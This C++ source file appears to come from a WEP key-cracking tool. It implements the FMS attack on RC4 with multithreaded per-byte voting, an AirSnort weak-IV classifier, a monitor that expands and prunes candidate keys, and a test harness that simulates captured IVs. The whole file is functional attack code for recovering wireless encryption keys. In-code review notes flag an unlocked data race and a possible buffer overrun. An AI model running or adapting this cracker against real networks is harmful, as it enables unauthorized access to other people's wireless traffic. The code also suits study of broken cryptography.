#include <list>
#include <vector>
#include <map>
#include <algorithm>
#include <functional>
#include <numeric>
#include <cassert>
#include <sstream>
#include <iomanip>

#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

#include "WEPCrack.h"

/* Render the first `len` bytes of a (possibly partial) WEP key as two-digit
 * lowercase hex. Positions at or beyond key.size() have not been cracked yet
 * and are shown as "__".
 */
string print_key(const vector<byte>& key, int len) {
	ostringstream out;
	out << hex << setfill('0');	// sticky: applies to every byte below

	for (int pos = 0; pos < len; ++pos) {
		const bool known = static_cast<size_t>(pos) < key.size();
		if (known)
			out << setw(2) << static_cast<int>(key[pos]);
		else
			out << "__";
	}

	return out.str();
}

void* CrackThreadStart(void* obj) {
	CrackThread* ct = (CrackThread*) obj;

	ct->crack();
}

/* Create a crack thread for secret-key byte B.
 *   I     - IV length in bytes
 *   l     - secret key length in bytes
 *   N     - S-box size (1..256)
 *   B     - index of the key byte this thread votes on (0 <= B < l)
 *   key   - the key bytes already fixed for this thread
 *   ivs   - list of captured IVs to process
 * The worker thread is started last, after every member it uses is set up.
 */
CrackThread::CrackThread(int I, int l, int N, int B, const vector<byte>& key,
		const list<WeakIV>& ivs, int debug_level): 
		I(I), l(l), N(N), B(B), key(key), IVs(ivs), hits(0), hitsFMS(0), processed(0){

	assert(I>0);
	assert(l>0);
	assert(N>0 && N<=256);
	assert(B>=0 && B<l);

	// Room for "[crack/" + a %p pointer (up to "0x" + 16 hex digits on
	// 64-bit) + "] " + NUL. The old 20-byte buffer truncated the pointer,
	// and "%010p" (0 flag with %p, non-void* argument) is undefined.
	char prefix[48];
	snprintf(prefix, sizeof(prefix), "[crack/%p] ", static_cast<void*>(this));
	dp.setPrefix(prefix);
	dp.setLevel(debug_level);
	
	stats = vector<int>(N, 0);

	// If creation failed, `thread` would be indeterminate and the destructor
	// would cancel/join a garbage handle, so fail fast instead.
	int rc = ::pthread_create(&thread, NULL, CrackThreadStart, this);
	if (rc != 0) {
		fprintf(stderr, "[crack] pthread_create failed (error %d)\n", rc);
		abort();
	}
}

/* Try to recover secret-key byte B from a single IV (FMS attack).
 *
 *   K         - RC4 key buffer: the IV in K[0..I) followed by the key bytes
 *               already cracked in K[I..I+B).
 *   Z         - first keystream byte observed for this IV.
 *   two_equal - out: set when any two of S[1], S[S[1]] and
 *               S[(S[1]+S[S[1]])%N] are equal; only assigned when a guess
 *               (>= 0) is returned.
 *
 * Runs the first I+B KSA steps. If the state is "resolved", i.e.
 * S[1] < I+B and (S[1] + S[S[1]]) mod N == I+B, the FMS guess
 *     K[I+B] = S^-1[Z] - j - S[I+B]   (mod N)
 * is returned; otherwise -1.
 */
int CrackThread::crackByte(byte* K, byte Z, bool& two_equal) {
	// The constructor enforces N <= 256, so a fixed-size S-box replaces the
	// former variable-length array (a compiler extension, not standard C++).
	assert(N > 0 && N <= 256);
	assert(I + B < N);	// KSA index and S[I+B] must stay inside the S-box
	byte S[256];
	int i, j;

	for(i=0; i<N; i++) // init S-box
		S[i]=i;
	j=0;

	for(i=0; i<I+B; i++) { // do KSA until byte B
		j = (j + S[i] + K[i%(I+l)]) % N;
		swap(S[i], S[j]);

		if (dp.getLevel()>4)
			dp.printDebug2("crackByte: KSA: i=%d j=%d K=%s S=[%s]\n",
				i,j, dp.printVector("", K, I+B).c_str(),
				dp.printVector("", S, N, " ").c_str());
	}
	// here i == I+B, the index of the key byte being guessed

	if ( S[1]>=i || (S[1] + S[S[1]])%N != i ) // not resolved: S[1] would be disturbed
		return -1;

	two_equal = ( S[1] == S[S[1]] ||
	              S[1] == S[(S[1]+S[S[1]])%N] ||
	              S[S[1]] == S[(S[1]+S[S[1]])%N] );

	// position of Z in the S-box, i.e. S^-1[Z]
	int k = find(S, S+N, Z) - S;
	assert(k<N);

	int KB = k - (j + S[i]);	// >= -(2N-2), so at most two wraps
	while(KB<0)
		KB+=N;

	return KB;
}

/* AirSnort's weak-IV classifier.
 *
 * Returns the index of the secret-key byte that IV `p` is weak for under
 * AirSnort's rules, or -1 if p matches none of them. Only p[0..2] are
 * examined. `sum` and `k` are deliberately unsigned char so the additions
 * and subtractions wrap mod 256.
 */
int AirSnortClassify(const vector<byte>& p) {
   // every rule below reads p[0], p[1] and p[2]; a shorter IV matches none
   // (previously this indexed past the end of the vector)
   if (p.size() < 3) {
      return -1;
   }

   unsigned char sum, k;

   //test for the FMS (A+3, N-1, X) form of IV
   if (p[1] == 255 && p[0] > 2 && p[0] < 16) {
      return p[0] - 3;
   }

   //test for other IVs for which it is known that
   // Si[1] < i and (Si[1] + Si[Si[1]]) = i + n  (see FMS 7.1)
   sum = p[0] + p[1];
   if (sum == 1) {
      if (p[2] <= 0x0A) {
         return p[2] + 2;
      }
      else if (p[2] == 0xFF) {
         return 0;
      }
   }
   k = 0xFE - p[2];
   if (sum == k && (p[2] >= 0xF2 && p[2] <= 0xFE && p[2] != 0xFD)) {
      return k;
   }
   return -1;
}

/* Worker loop of a crack thread (entered via CrackThreadStart).
 *
 * Votes for secret-key byte B. Every IV in IVs is fed to crackByte() together
 * with the already-known key bytes. Each successful guess adds to
 * stats[guess] (+3 when crackByte reports two_equal, +1 otherwise) and bumps
 * `hits`, and `hitsFMS` when AirSnortClassify also points at byte B.
 * `processed` counts every IV examined. The loop never returns; the thread
 * is stopped by the pthread_cancel() in the destructor.
 *
 * NOTE(review): IVs is traversed here without any lock while, presumably,
 * the owning Monitor appends to the same list from another thread (addIV).
 * That looks like a data race on std::list; confirm against the header.
 */
void CrackThread::crack() {
	dp.printVerbose("started %s\n", print_key(key, l).c_str());
	
	list<WeakIV>::const_iterator currentIV, nextIV;

	// NOTE: variable-length array (compiler extension, not standard C++)
	byte K[I+l]; // RC4 key = IV + WEP(secret) key

	// get known WEP key bytes (Monitor builds `key` with B bytes for a
	// thread cracking byte B), placed right after the IV
	copy(key.begin(), key.end(), K+I);
	
	// wait while list of IVs is empty
	while (IVs.begin() == IVs.end())
		sleep(1);

	// 2 iterators are needed because otherwise currentIV
	// gets stuck in IVs.end() forever.
	// Consequence: the newest IV in the list is only processed once
	// another IV has been appended after it.
	currentIV = nextIV = IVs.begin();
	nextIV++;
	
	while(1) {
		while(nextIV != IVs.end()) {
			// check if manager is trying to stop this thread
			::pthread_testcancel();
			
			// get IV into the RC4 key
			// NOTE(review): assumes every IV has exactly I bytes; a longer
			// one would overwrite the known key bytes at K+I (or overflow K)
			copy(currentIV->IV.begin(), currentIV->IV.end(), K);

			// try to crack it
			bool two_equal;	// only assigned by crackByte when rez >= 0
			int rez = crackByte(K,currentIV->Z, two_equal);

			if (rez>=0) { // found something
				// guesses from states with two equal values weigh 3 votes
				if(two_equal)
					stats[rez]+=3;
				else 
					stats[rez]++;
				hits++;

				// also count IVs that AirSnort's classifier assigns to byte B
				int AS = AirSnortClassify(currentIV->IV);
			        if (AS == B) 
					hitsFMS++;

				// print verbose info
				if (dp.getLevel()>2) {
				  ostringstream ss;

			  	  ss << "#" << processed;
			  	  ss << dp.printVector(" IV=", currentIV->IV);
			  	  ss << " Z=" << setw(2) << hex << setfill('0') 
			  	    << (int)currentIV->Z << dec << setfill(' ');
				  // known bytes, then the guess in <..>, then unknown bytes
				  ss << " K=" << print_key(key, B) << '<';
				  ss << setw(2) << hex << setfill('0') <<
					rez << dec << setfill(' ');
				  ss << '>';
				  for(int i=0; i<l-B-1; i++)
					ss << "__";
				  // flags: 2 = two_equal, A = AirSnort-classified for B
				  if (two_equal || AS ==B) {
					ss << " [";
					if (two_equal)
						ss << '2';
					if (AS == B)
						ss << 'A';

					ss << "]";
				  }
				
				  ss << endl;
				  dp.printVerbose("%s", ss.str().c_str());
				}
			} else if (dp.getLevel()>3) { // print debug info
				ostringstream ss;

			  	ss << "#" << processed;
				ss << dp.printVector(" IV=", currentIV->IV);
				ss << " Z=" << setw(2) << hex << setfill('0') 
				    << (int)currentIV->Z << dec << setfill(' ');
				
				ss << " gave nothing" << endl;
				dp.printDebug("%s", ss.str().c_str());
			}
			
			processed++;
			currentIV++;
			nextIV++;
		}

		dp.printVerbose("sleeping %s\n", print_key(key, l).c_str());
		sleep(1); // no new IVs so we wait a bit
		
		// re-check whether something was appended after currentIV
		nextIV = currentIV;
		nextIV++;
	}
}

CrackThread::~CrackThread() {
	// Ask the worker to stop, then block until it has really exited: the
	// worker dereferences `this`, so the object must outlive it.
	const pthread_t worker = thread;
	::pthread_cancel(worker);
	::pthread_join(worker, NULL);

	const string shown = print_key(key, l);
	dp.printVerbose("exiting %s\n", shown.c_str());
}

class StatsOrdering: public binary_function<byte, byte, bool> {
	private:
		const vector<int>& stats;

	public: 
		StatsOrdering(const vector<int>& stat): stats(stat) { }
	
		bool operator() (byte x, byte y) {
			return stats[x] > stats[y];
		}
};

/* Compute the first RC4 keystream byte for the key (IV || secret key):
 * run the full KSA, then one PRGA step.
 *   I    - IV length (bytes taken from iv.IV)
 *   _l   - secret key length (bytes taken from secK)
 *   N    - S-box size (256 for real RC4; must be in 1..256)
 * secK and iv are only read.
 */
byte rc4_Z(int I, int _l, int N, vector<byte>& secK, WeakIV& iv) {
	assert(N>0 && N<=256);

	const int keylen = I + _l;	// RC4 key len
	vector<byte> K(keylen);		// RC4 key = IV || secret key
	for (int n=0; n<I; n++)
		K[n] = iv.IV[n];
	for (int n=0; n<_l; n++)
		K[I+n] = secK[n];

	// --- KSA ---
	byte S[256];			// only S[0..N) is used
	for (int n=0; n<N; n++)
		S[n] = n;

	int j = 0;
	for (int i=0; i<N; i++) {
		j = (j + S[i] + K[i % keylen]) % N;
		swap(S[i], S[j]);
	}

	// --- first PRGA step (i = 1, j = 0 + S[1]) ---
	// The swap must happen before the output lookup. Reading
	// S[(S[1]+S[S[1]])%N] before swapping gives the wrong byte whenever
	// that index is 1 or S[1].
	j = S[1];
	swap(S[1], S[j]);
	return S[(S[1] + S[j]) % N];
}

void* MonitorThreadStart(void* obj) {
	Monitor* mon = (Monitor*) obj;

	mon->monitor();
}

/* Create the monitor.
 * Validates the parameters, starts the root crack thread (which votes on
 * key byte 0 with no known key bytes), then starts the monitor thread that
 * grows and prunes the tree of crack threads.
 */
Monitor::Monitor(int I, int l, int N, int topN, int depthM, int forkAt, 
		int topNhi, int loadlimit,
		int debug_level, int crack_debug_level): 
  // There is no IVs constructor parameter: the former `IVs(IVs)` initialised
  // the member from itself (undefined behaviour). Start with an empty list.
  I(I), l(l), N(N), IVs(), topN(topN), depth(depthM), forkLimit(forkAt),
  topNhi(topNhi), loadlimit(loadlimit) {
	assert(I>0);
	assert(l>0);
	assert(N>1 && N<=256);

	assert(topN>0);
	assert(topNhi>0);
	assert(depthM>0);
	assert(forkAt>0);
	assert(loadlimit>0);

	dp.setPrefix("[monitor] ");
	dp.setLevel(debug_level);
	crackDL = crack_debug_level;
	
	vector<byte> key(0);
	root = new CrackThread(I,l,N,0,key,IVs, crackDL);
	// %p takes a void* and does not accept the 0 flag
	dp.printVerbose("started %p (%s)\n", static_cast<void*>(root), 
			print_key(key, l).c_str());
	
	::pthread_mutex_init(&keys_lock, NULL);
	int rc = ::pthread_create(&monitor_thread, NULL, MonitorThreadStart, this);
	if (rc != 0) {
		// the destructor would otherwise cancel/join an indeterminate handle
		fprintf(stderr, "[monitor] pthread_create failed (error %d)\n", rc);
		abort();
	}
}

Monitor::~Monitor() {
	// Stop the monitor thread first, so nothing else walks or edits the
	// thread tree while it is being torn down.
	::pthread_cancel(monitor_thread);
	::pthread_join(monitor_thread, NULL);
	::pthread_mutex_destroy(&keys_lock);

	// Delete every spawned crack thread. Each entry is unlinked from the
	// map before its object (and therefore its worker) is destroyed.
	while (!threads.empty()) {
		multimap<CrackThread*, CrackThread*>::iterator first = threads.begin();
		CrackThread* doomed = first->second;
		threads.erase(first);
		delete doomed;
	}

	// Finally the root thread, which is never stored in `threads`.
	delete root;
	root = NULL;
}

class ThreadIsCrackingByte {
	private:
		int level;
		byte b;

	public:
		ThreadIsCrackingByte(int l, byte b): level(l), b(b) { }

		bool operator() (pair<CrackThread*, CrackThread*> thr_pair) {
			CrackThread* thr = thr_pair.second;
			
			return thr->getKey()[level] == b;
		}
};

/* Re-evaluate the children of `thread`, which votes on key byte `level`.
 * For each of its best-voted candidate bytes with at least forkLimit votes:
 *  - an existing child for that byte is kept and checked recursively;
 *  - otherwise a child is started (load permitting), or, for the last key
 *    byte, the complete key is queued in `keys`.
 * Every child not kept this way is killed together with its subtree.
 */
void Monitor::check_thread(CrackThread* thread, int level) {
	typedef pair<CrackThread*, CrackThread*> thread_pair;
	typedef list<thread_pair> list_t; // short aliases
	list_t kill_list; // children not (yet) confirmed as still wanted
	list_t::iterator ptr;

	// Private snapshot of the vote counters: the crack thread keeps
	// incrementing them, and sort() needs a stable view.
	vector<int> stats = thread->getStats();

	// candidate key bytes 0..N-1, best-voted first
	vector<byte> key_byte(N);
	iota(key_byte.begin(), key_byte.end(), 0);
	sort(key_byte.begin(), key_byte.end(), StatsOrdering(stats));

	// copy all subthreads to kill list
	copy(threads.lower_bound(thread), threads.upper_bound(thread),
			insert_iterator<list_t>(kill_list, kill_list.begin()));

	// topN/topNhi are only asserted to be positive; never look past the N
	// candidates that actually exist.
	int top = min((level<depth)? topN : topNhi, N);
	for(int i=0; i<top; i++) {
		if(stats[key_byte[i]] < forkLimit)
			continue;
		
		// find a running thread for key_byte[i]
		ptr = find_if(kill_list.begin(), kill_list.end(),
				ThreadIsCrackingByte(level, key_byte[i]));
		
		if (ptr == kill_list.end()) { // doesn't exist -> create it

			vector<byte> key = thread->getKey();
			key.push_back(key_byte[i]);

			// last byte -> generate keys, not threads
			// NOTE(review): no thread is recorded for these keys, so the same
			// key is queued again on every monitor pass while it remains
			// among the top candidates.
			if(level == l-1) {
				::pthread_mutex_lock(&keys_lock);
				keys.push_back(key);
				::pthread_mutex_unlock(&keys_lock);

				continue;
			}
			
			// start a new one only while the 1-minute load average is
			// below loadlimit - starting too many threads is EVIL
			double loadavg;
			if (getloadavg(&loadavg, 1) == 1 && loadavg<loadlimit) {
				CrackThread* new_thr = 
					new CrackThread(I,l,N,level+1,key,IVs,crackDL);

				threads.insert(thread_pair(thread, new_thr));

				// %p takes a void* and does not accept the 0 flag
				dp.printVerbose("started %p (%s)\n",
					static_cast<void*>(new_thr),
					print_key(key, l).c_str());
			}

		} else { // exists -> keep it, recurse, drop it from kill_list
			check_thread(ptr->second, level+1);
			kill_list.erase(ptr);
		}
	}

	// kill threads left in the kill list
	while(!kill_list.empty()) {
		erase_thread_recursive(kill_list.front().first, 
				kill_list.front().second);
		kill_list.pop_front();
	}
}

/* Destroy `thr` (a child of `parent`) and, depth-first, all of its
 * descendants: each is unlinked from `threads` and then deleted, which
 * cancels and joins its worker.
 */
void Monitor::erase_thread_recursive(CrackThread* parent, CrackThread* thr) {
	typedef multimap<CrackThread*, CrackThread*> thread_map;

	// Snapshot thr's children first. The recursive calls below erase
	// entries from `threads`, which would invalidate iterators into it.
	vector<CrackThread*> children;
	for(thread_map::iterator it = threads.lower_bound(thr);
	    it != threads.upper_bound(thr); ++it) {
		assert(it->first == thr);
		children.push_back(it->second);
	}

	// delete children (in the same order they are stored in the map)
	for(size_t c = 0; c < children.size(); ++c)
		erase_thread_recursive(thr, children[c]);

	// unlink thr from its parent
	thread_map::iterator current = threads.lower_bound(parent);
	thread_map::iterator last = threads.upper_bound(parent);
	while(current != last && current->second != thr)
		++current;

	assert(current != last);
	// Without this check an NDEBUG build would erase upper_bound(parent),
	// i.e. an unrelated entry or end().
	if (current != last)
		threads.erase(current);

	// %p takes a void* and does not accept the 0 flag
	dp.printVerbose("deleting %p (%s)\n", static_cast<void*>(thr), 
			print_key(thr->getKey(),l).c_str());
	delete thr;
}

void Monitor::print_threads_recursive(CrackThread* thr, int level) {
	multimap<CrackThread*, CrackThread*>::iterator 
		current = threads.lower_bound(thr);

	ostringstream ss;
	ss << print_key(thr->getKey(), l);
	
	// --- stats ---
	vector<byte> bytes(N);
	const vector<int>& stats = thr->getStats();
	const vector<byte>& key = thr->getKey();

	iota(bytes.begin(), bytes.end(), 0);
	sort(bytes.begin(), bytes.end(), StatsOrdering(stats));

	for(int j=0; j<10; j++) {
		ss << "  ";
		ss << setw(3) << stats[bytes[j]];
		ss << '/';
		ss << setfill('0') << setw(2) << hex << (int)bytes[j];
		ss << setfill(' ') << dec;
	}

	int hits = thr->getHits();
	int processed = thr->getProcessed();
	float ratio = 0;
	if (processed) 
		ratio = 100 * (float)hits/processed; 
	ss << "     ";
	ss << setw(4) << hits << '/';
	ss << setw(8) << setiosflags(ios::left) << processed 
		<< resetiosflags(ios::left);
	ss << " (" ;
	ss << setiosflags(ios::fixed) << setprecision(4) << ratio 
		<< resetiosflags(ios::fixed);
	ss << "%)";
	
	hits = thr->getHitsFMS();
	if (processed) 
		ratio = 100 * (float)hits/processed; 
	ss << "     ";
	ss << setw(4) << hits << '/';
	ss << setw(8) << setiosflags(ios::left) << processed 
		<< resetiosflags(ios::left);
	ss << " (" ;
	ss << setiosflags(ios::fixed) << setprecision(4) << ratio << resetiosflags(ios::fixed);
	ss << "%)";

	ss << endl;

	dp.printVerbose("%s", ss.str().c_str());

	while(current!=threads.upper_bound(thr)) {
		print_threads_recursive(current->second, level+1);
		current++;
	}
}

/* Pop the oldest queued candidate key into `key`.
 * Returns true if one was available, false (leaving `key` untouched)
 * otherwise. The queue is accessed under keys_lock.
 */
bool Monitor::getNextKey(vector<byte>& key) {
	bool have_key = false;

	::pthread_mutex_lock(&keys_lock);
	if (keys.begin() != keys.end()) {
		key = keys.front();
		keys.pop_front();
		have_key = true;
	}
	::pthread_mutex_unlock(&keys_lock);

	return have_key;
}

/* Monitor thread body: every 5 seconds, print the thread tree, then prune
 * and expand it. Loops until cancelled by the destructor.
 */
void Monitor::monitor() {
	for (;;) {
		::pthread_testcancel();

		print_threads_recursive(root, 0);
		check_thread(root, 0);

		sleep(5);
	}
}

#ifdef TEST
int main() {
	int I = 3;
	int l = 13;
	int N = 256;
	
	WeakIV iv;
	list<WeakIV> IVs;
	vector<byte> K;
	
	srand( time(NULL) ); // poor man's random seed
	
	K.push_back(0x10);
	K.push_back(0x02);
	K.push_back(0x30);
	K.push_back(0x04);
	K.push_back(0x50);
	K.push_back(0xdf);
	K.push_back(0xff);
	K.push_back(0xde);
	K.push_back(0xa4);
	K.push_back(0x3e);
	K.push_back(0xA7);
	K.push_back(0x14);
	K.push_back(0x33);

	Monitor mon(I,l,N, 3, 3, 5);
	
	int i = 0;
	while(1) {
		iv.IV.clear();
		iv.IV.push_back(rand()%N);
		iv.IV.push_back(rand()%N);
		iv.IV.push_back(rand()%N);
		
		iv.Z = rc4_Z(I,l,N, K, iv);

		mon.addIV(iv);
		
		i++;
		if (i%1000000 == 0) {
			sleep(5);
			i = 0;
		}	
	}
}
#endif // TEST
